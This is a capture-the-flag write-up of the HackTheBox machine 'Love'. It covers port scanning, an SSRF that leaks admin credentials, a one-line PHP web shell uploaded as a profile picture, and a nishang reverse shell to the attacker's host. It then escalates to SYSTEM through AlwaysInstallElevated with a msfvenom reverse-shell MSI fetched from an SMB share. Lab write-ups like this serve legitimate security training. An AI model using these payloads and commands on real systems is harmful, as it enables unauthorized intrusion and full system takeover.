Love is an easy rated machine on HackTheBox by pwnmeow. For user we will abuse a SSFR to bypass access checks on a webserver and gain access to a voting application. There we will upload a php web shell as profile-picture leading to RCE and a foothold. To get SYSTEM we will abuse the AlwaysInstallElevated registry keys after a short enumeration.
User
Nmap
As always we start our enumeration of with a nmap scan against all ports, followed by a script and version scan against the ones being open to get a full picture about the attack surface.
All ports
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ sudo nmap -p- -T4 10.129.4.229
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-02 09:18 UTC
Nmap scan report for staging.love.htb (10.129.4.229)
Host is up (0.027s latency).
Not shown: 65517 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5000/tcp open upnp
5040/tcp open unknown
5985/tcp open wsman
5986/tcp open wsmans
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 52.32 seconds
Script and version scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
$sudo nmap -p80,135,139,443,445,3306,5000,5040,5985,5986,47001,49664,49665,49666,49667,49668,49669,49670 -sC -sV 10.129.4.229
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-02 09:23 UTC
Nmap scan report for staging.love.htb (10.129.4.229)
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Secure file scanner
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
|_ssl-date: 2021-05-02T09:48:14+00:00; +22m18s from scanner time.
| tls-alpn:
|_ http/1.1
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h07m18s, deviation: 3h30m00s, median: 22m17s
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-05-02T02:48:00-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-02T09:48:04
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.54 seconds
SSRF
The nmap scan identified a vhost staging.love.htb which we add to our /etc/hosts file. Port 443 and 5000 return a 403 forbidden which will be interesting in the next step. On the main page we see a voting system application, where we can log in at /admin. The application is vulnerable to sql injection however this seems to be a rabbit hole.
Heading over to the vhost we find a file-scanner where we can enter an url to scan. Going after the file name it seems to be a beta application which makes it particularily interesting.
We can abuse the SSRF in this application to visit port 5000 from localhost and bypass the IP filtering. This returns the login credentials admin:@LoveIsInTheAir!!!! for the voting system over on the main page.
File upload
Logged in to the application we can change the profile picture of the user to a simple php webshell.
grem.php
1
<?php system($_REQUEST['cmd']); ?>
There is a cleanup script going, so we intercept the upload request in burp and send it to repeater for easy access later on in case our reverse shell dies.
We can now open the image location of the profile picture in a new tab confirm the rce and also send the request to repeater.
For our reverseshell we use the nishang Invoke-PowerShellTcp.ps1 add the line Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.27 -Port 7575
to the bottom and host it on a python webserver. Then we invoke it with burp, get a hit on our webserver and a connection back as phoebe soon after.
1
2
3
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.4.229 - - [02/May/2021 09:53:32] "GET /grem.ps1 HTTP/1.1" 200 -
1
2
3
4
5
6
7
8
9
10
11
12
$ rlwrap nc -lnvp 7575
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::7575
Ncat: Listening on 0.0.0.0:7575
Ncat: Connection from 10.129.4.229.
Ncat: Connection from 10.129.4.229:50477.
Windows PowerShell running as user Phoebe on LOVE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
love\phoebe
PS C:\xampp\htdocs\omrs\images>
Now we can grab the user.txt on phoebe’s Desktop and begin our enumeration to get to SYSTEM.
SYSTEM
To enumerate the system we host winPEASany.exe from the obfuscated releases on a smb share with impacket to not write to disc and exectute in a second step from the target.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ sudo impacket-smbserver -smb2support files .
Impacket v0.9.23.dev1+20210111.162220.7100210f - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.4.229,50478)
[*] AUTHENTICATE_MESSAGE (LOVE\Phoebe,LOVE)
[*] User LOVE\Phoebe authenticated successfully
[*] Phoebe::LOVE:aaaaaaaaaaaaaaaa:cc74af2c8e2810b3d969a65112366120:010100000000000000c19ab6393fd701fd77ff95f64ac71a000000000100100079006d005900640044004500510068000300100079006d00590064004400450051006800020010006b006d0041006800490055006c006900040010006b006d0041006800490055006c0069000700080000c19ab6393fd70106000400020000000800300030000000000000000000000000200000260cd1eb03eae60b159a2fcb767ff7e4a1946e56db826cd54e9a1336727afbce0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320037000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:files)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:files)
[*] Closing down connection (10.129.4.229,50478)
[*] Remaining connections []
1
PS C:\xampp\htdocs\omrs\images> \\10.10.14.27\files\wpa.exe
In the output we see that the AlwaysInstallElevated registry keys are both set to 1, which means we can easily get to system running a malicious msi.
1
2
3
4
[+] Checking AlwaysInstallElevated
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
In a first step we create the msi using msfvenom and select a reverse shell as payload.
1
2
3
4
5
6
7
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.27 LPORT=7575 -f msi -o grem.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: grem.msi
We set up a ncat listener on the specified port and execute it from our smb share as we did with winpeas before.
1
PS C:\xampp\htdocs\omrs\images> msiexec /quiet /qn /i \\10.10.14.27\files\grem.msi
Soon after we get a hit on our listener as nt authority\system. Now we can grab the root.txt from the administrator’s desktop.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$rlwrap nc -lnvp 7575
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::7575
Ncat: Listening on 0.0.0.0:7575
Ncat: Connection from 10.129.4.229.
Ncat: Connection from 10.129.4.229:50480.
Microsoft Windows [Version 10.0.19042.928]
(c) Microsoft Corporation. All rights reserved.
whoami
whoami
nt authority\system
C:\WINDOWS\system32>